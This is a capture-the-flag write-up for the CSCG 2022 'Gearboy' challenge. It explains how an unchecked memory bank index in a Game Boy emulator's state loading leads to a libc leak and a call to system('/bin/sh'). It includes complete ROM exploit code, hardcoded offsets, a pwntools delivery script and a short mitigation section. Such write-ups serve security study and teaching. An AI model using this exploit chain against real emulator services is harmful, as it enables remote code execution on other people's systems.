cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy

---
documentclass: extarticle
geometry: margin=2cm
title: Gearboy Writeup
author: sinitax
fontsize: 12pt
---

## Exploit

The task is to gain remote code execution (at least to the point of
reading the contents of the flag file) by manipulating only a Game Boy
ROM and state file, which will be run on the server using a modified,
headless version of [*Gearboy*](https://github.com/drhelius/Gearboy),
a Game Boy emulator.

My immediate suspicion was that checks were missing for the state file
rather than the ROM: the state can be saved at any time, and it's
generally easier to forget a check that is needed before every use than
one that is performed once when loading the ROM.

By inspecting the source code for `GearboyCore::LoadState` we find that
the emulator's functionality is split across many different classes, each
with its own `LoadState`, e.g. `Processor::LoadState` and `Memory::LoadState`.

`Memory::LoadState` loads, among other things, various memory bank buffers
as well as the values which control which of those banks are selected. Since
the Game Boy only has a 16-bit address space, parts of the memory must be
swapped in and out to give access to larger amounts. Often an index is used
to indicate which memory bank is in use, as is the case with `WRAM1`:

```cpp
u8* Memory::GetWRAM1()
{
    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
}
```
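
To make the banking idea concrete, here is a minimal Python model of the lookup above. It is only a sketch: `wram1_offset`, `BANK_SIZE` and the eight-bank buffer are names and sizes made up for illustration, and the buffer is a plain `bytearray` rather than emulator memory.

```python
BANK_SIZE = 0x1000  # size of one switchable bank, taken from GetWRAM1()


def wram1_offset(gb_addr: int, current_bank: int) -> int:
    """Byte offset into the bank buffer for a Game Boy address in 0xD000-0xDFFF."""
    if not 0xD000 <= gb_addr <= 0xDFFF:
        raise ValueError("address is outside the WRAM1 window")
    return BANK_SIZE * current_bank + (gb_addr - 0xD000)


# Backing storage for the demo (hypothetical size: eight banks).
wram_banks = bytearray(8 * BANK_SIZE)

# The same Game Boy address lands in a different place for each bank index.
wram_banks[wram1_offset(0xD010, 1)] = 0xAA
wram_banks[wram1_offset(0xD010, 2)] = 0xBB
```

The emulated program only ever sees `0xD010`; which byte it touches depends entirely on the bank index.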

As long as `m_bCGB` (a flag enabling Game Boy Color mode) is set, the
backing buffer of `WRAM1` will be chosen from a bank in `m_pWRAMBanks`.
The value of `m_bCGB` is determined by special-purpose bytes in the
ROM, which we control.

Since `m_iCurrentWRAMBank` is loaded as part of the state and its value
is not range-checked, modifying this value in the state file allows us to
essentially mmap an arbitrary piece of memory into the address space of our
emulated game. When the running ROM reads from or writes to `0xD000-0xE000`,
it will instead access the address we control.
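
As a small worked example of what such a modified value looks like, the snippet below encodes a negative bank index the way the state patching script in this writeup does (a 32-bit little-endian signed integer) and shows where the resulting window starts relative to `m_pWRAMBanks`. The variable names are only illustrative.

```python
import struct

BANK_SIZE = 0x1000  # multiplier used by GetWRAM1()
bank = -0x13        # the bank index used later in this writeup

# Bytes as they would appear in the state file.
encoded = struct.pack("<i", bank)
print(encoded.hex())  # edffffff

# A negative index moves the window in front of the bank buffer.
window_start = BANK_SIZE * bank
print(hex(window_start))  # -0x13000
```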

But where to write when ASLR is enabled?

To get around ASLR we need to find objects on the heap which sit at
consistent offsets from the `WRAM` bank buffer `m_pWRAMBanks`. We can do
this by running `gdbserver` in the docker container and observing the
surrounding memory and the pointers of objects allocated shortly before or
after it. The fact that each session is a freshly spawned docker container
helps with consistency.

Doing this we find a heap layout which is consistent on every first
run in the docker container: the `Processor` object is at an offset of
`-0x126a0` from `m_pWRAMBanks` and the `Memory` object is at an offset of
`-0xd0` from the `Processor` object, i.e. `-0x12770` from `m_pWRAMBanks`.
By setting `m_iCurrentWRAMBank` to `-0x13` in the state file, the window
starts `0x13000` bytes before `m_pWRAMBanks`, so we are able to access the
`Processor` object at `0x13000-0x126a0+0xD000=0xD960` and the `Memory`
object at `0x13000-0x12770+0xD000=0xD890`.
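
The address arithmetic can be double-checked with a few lines of Python. This is a sketch under the offsets stated above; `gb_address` is a hypothetical helper, not part of any tool used for the exploit.

```python
BANK_SIZE = 0x1000
WRAM1_START = 0xD000


def gb_address(offset_from_wram_banks: int, bank: int) -> int:
    """Game Boy address at which a host object becomes visible.

    offset_from_wram_banks is the object's host address minus m_pWRAMBanks.
    """
    addr = WRAM1_START + offset_from_wram_banks - BANK_SIZE * bank
    if not WRAM1_START <= addr < WRAM1_START + BANK_SIZE:
        raise ValueError("object is not inside the WRAM1 window for this bank")
    return addr


PROCESSOR_OFFSET = -0x126A0
MEMORY_OFFSET = PROCESSOR_OFFSET - 0xD0  # -0x12770

print(hex(gb_address(PROCESSOR_OFFSET, -0x13)))  # 0xd960
print(hex(gb_address(MEMORY_OFFSET, -0x13)))     # 0xd890
```

Both objects fall into the same 4 KiB window, which is why a single bank index is enough to reach them.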

For every instruction, the processor resolves the function for handling
an opcode by looking it up in a table, using the opcode as the index. This
`opcodeTable` is a member of the `Processor` object and as such is stored
on the heap. By reading one of these function pointers and subtracting
its offset in the binary we can recover the base address at which the
Gearboy emulator is loaded.
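
A minimal sketch of that subtraction, using the handler offset `0x1d420` from the ROM code in this writeup. The leaked pointer value is invented for the example, and the offset only applies to the specific binary built for the challenge.

```python
OP_0X00_HANDLER_OFFSET = 0x1D420  # offset of the opcode 0x00 handler in the binary


def image_base(leaked_handler: int, handler_offset: int = OP_0X00_HANDLER_OFFSET) -> int:
    """Recover the load address of the binary from a leaked handler pointer."""
    base = leaked_handler - handler_offset
    # A load address is page aligned; anything else means the offset is wrong.
    if base & 0xFFF:
        raise ValueError("result is not page aligned, wrong offset or wrong leak")
    return base


leak = 0x55555556D420  # hypothetical value read from the opcode table
print(hex(image_base(leak)))  # 0x555555550000
```

The alignment check is a cheap way to notice that a different binary (with different offsets) is running.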

Now that we know the base address, and as a result the address of the
GOT, the natural next step would be to leak libc by reading the GOT,
calculate the address of `system` and overwrite a function pointer
to call it. The only problem is that we are still just a ROM in
an emulator and only have access to the memory mapped into `0xD000-0xE000`.

We need to look for another access primitive.

This time, however, we are not limited to the contents of our state and
ROM files. We can manipulate the `Memory` and `Processor` objects directly!

Looking through the source code again we find a good candidate:

```cpp
u8* Memory::GetVRAM()
{
    if (m_bCGB)
        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
    else
        return m_pMap + 0x8000;
}
```

We have already set `m_bCGB`, and `m_iCurrentLCDRAMBank` is loaded from the
state file. As such, we can make accesses to `0x8000-0xA000` be backed by
the `m_pLCDRAMBank1` buffer, whose pointer we can overwrite through the
`WRAM1` window.
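
The effect of this second primitive can be modelled as a simple address translation. The sketch below mirrors the branch in `GetVRAM` and assumes the emulator indexes the returned pointer with `address - 0x8000`; that indexing, the function name and all addresses are assumptions made for illustration.

```python
VRAM_START = 0x8000


def vram_host_address(gb_addr: int, cgb: bool, lcd_bank: int,
                      lcd_bank1_ptr: int, map_ptr: int) -> int:
    """Host address backing a Game Boy VRAM address, following GetVRAM()."""
    if cgb and lcd_bank == 1:
        base = lcd_bank1_ptr          # pointer stored in the Memory object
    else:
        base = map_ptr + VRAM_START   # regular VRAM inside the main map
    return base + (gb_addr - VRAM_START)


# Hypothetical addresses: once the bank 1 pointer is replaced, a read from
# 0x8000 is served from wherever that pointer points.
target = 0x55555559AD78
print(hex(vram_host_address(0x8000, True, 1, target, 0x7F0000000000)))
```

Unlike the `WRAM1` window, this pointer is absolute, so it is not tied to addresses near the heap buffer.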

We set `m_pLCDRAMBank1` in the `Memory` object to point to the GOT entry
of `free`, whose address is calculated from the base address. We can then
read the address of `free` from `0x8000`, derive the libc base and calculate
the address of `system`.
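
As a sketch of this step, the libc arithmetic looks as follows. The two offsets are the ones used in the ROM code in this writeup and are only valid for the libc build in the challenge container; the leaked value is made up.

```python
FREE_OFFSET = 0x9A6D0    # offset of free in the target libc
SYSTEM_OFFSET = 0x52290  # offset of system in the target libc


def system_address(leaked_free: int) -> int:
    """Compute the address of system() from a leaked address of free()."""
    libc_base = leaked_free - FREE_OFFSET
    if libc_base & 0xFFF:
        raise ValueError("libc base is not page aligned, offsets do not match")
    return libc_base + SYSTEM_OFFSET


leak = 0x7FFFF7E6A6D0  # hypothetical value read from the GOT via 0x8000
print(hex(system_address(leak)))  # 0x7ffff7e22290
```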

To finally call `system`, we overwrite a function pointer in
`Processor::opcodeTable` and execute the corresponding opcode.
We ensure the first argument to `system` points to the string **/bin/sh**
by writing it to the address of the `Processor` object, as this is the address
in `rdi` when the handler is called. Since `opcodeTable` is the first
member of `Processor`, we need to choose an opcode whose table entry does
not overlap the space used for the string and which is not executed
before the pointer has been fully written (as is the case with the load
instructions). The `stop` instruction (opcode `0x10`) is a good fit here.
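
The overlap constraint can be checked mechanically. The sketch below assumes each table entry is `0x10` bytes wide, which is inferred from the ROM code writing the pointer at `0x10*0x10` for opcode `0x10`; the helper names are hypothetical.

```python
ENTRY_SIZE = 0x10            # assumption: size of one opcodeTable entry
COMMAND = b"/bin/sh\x00"     # string written to the start of the Processor object


def entry_offset(opcode: int) -> int:
    """Offset of an opcode's table entry from the start of the Processor object."""
    return opcode * ENTRY_SIZE


def clobbered_opcodes(data: bytes) -> set:
    """Opcodes whose table entry overlaps data written at offset 0."""
    return {i // ENTRY_SIZE for i in range(len(data))}


print(clobbered_opcodes(COMMAND))  # {0}
print(hex(entry_offset(0x10)))     # 0x100
```

Under this assumption only the entry for opcode `0x00` is overwritten by the string, and the entry for `stop` is well clear of it.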

### Mitigation

This attack can be mitigated by validating the values loaded from the
state file. This would have prevented the initial out-of-bounds read /
write and, as such, the subsequent RCE. For `m_iCurrentWRAMBank` this can
be implemented as a simple range check.
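
The shape of such a check is sketched below in Python for brevity; the real fix would live in the C++ `Memory::LoadState`. The accepted range of 1 to 7 is an assumption based on the Game Boy Color having seven switchable WRAM banks, and `load_wram_bank` is a hypothetical helper.

```python
import struct

WRAM_BANK_MIN = 1  # assumption: lowest switchable WRAM bank
WRAM_BANK_MAX = 7  # assumption: highest switchable WRAM bank


def load_wram_bank(raw: bytes) -> int:
    """Decode the bank index from state data and reject out-of-range values."""
    (bank,) = struct.unpack("<i", raw)
    if not WRAM_BANK_MIN <= bank <= WRAM_BANK_MAX:
        raise ValueError(f"invalid WRAM bank in state file: {bank}")
    return bank


print(load_wram_bank(struct.pack("<i", 3)))  # 3
```

With this check in place, the value `-0x13` used by the exploit is rejected while loading the state, before any memory access uses it.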

\newpage

**ROM Code (compiled using GBDK):**\footnote{https://github.com/gbdk-2020/gbdk-2020/}

```C
#include <stdint.h>
#include <string.h>

void
main(void)
{
	volatile static uint8_t *processor_gb;
	volatile static uint8_t *memory_gb;
	volatile static uint8_t *free_got_gb;
	volatile static uint64_t op0x00;
	volatile static uint64_t base;
	volatile static uint64_t libc;
	volatile static uint64_t free_got;
	volatile static uint64_t target;

	/* WRAM BANK = -0x13: Processor is visible at 0xD960, Memory 0xd0 below */
	processor_gb = (void*) 0xD960;
	memory_gb = processor_gb - 0xd0;

	/* get base from op0x00 (first opcodeTable entry minus its offset) */
	op0x00 = *(uint64_t*)processor_gb;
	base = op0x00 - 0x1d420;
	free_got = base + 0x4ad78;

	/* change lcdrambank pointer to access got */
	*(uint64_t*)(memory_gb+0x90) = free_got;
	free_got_gb = (void*) 0x8000;

	/* VRAM now aliases the GOT: read free and derive the libc base */
	libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;

	/* place the command string and point opcode 0x10 (stop) at system */
	target = libc + 0x52290;
	strcpy((char*)processor_gb, "/bin/sh");
	*(uint64_t*)(processor_gb+0x10*0x10) = target;

	/* executing stop now calls system("/bin/sh") */
	__asm \
		stop \
	__endasm;

	while (1);
}
```

\newpage

**Upload and state modification script:**

```python
import struct
from base64 import b64encode
from sys import argv

from pwn import *

# read the compiled ROM and a state file saved by the emulator
with open("main.gb", "rb") as f:
    rom = f.read()
with open("main.state", "rb") as f:
    state = bytearray(f.read())

# set m_iCurrentWRAMBank
state[0x10000:0x10004] = struct.pack("<i", -0x13)

# set m_iCurrentLCDRAMBank
state[0x10004:0x10008] = struct.pack("<i", 1)

# argv[1:] is the command used to start (or connect to) the target
io = process(argv[1:])

# send the ROM, then the state, each base64-encoded on its own line
io.sendline(b64encode(rom))
io.sendline(b64encode(bytes(state)))

io.interactive()
```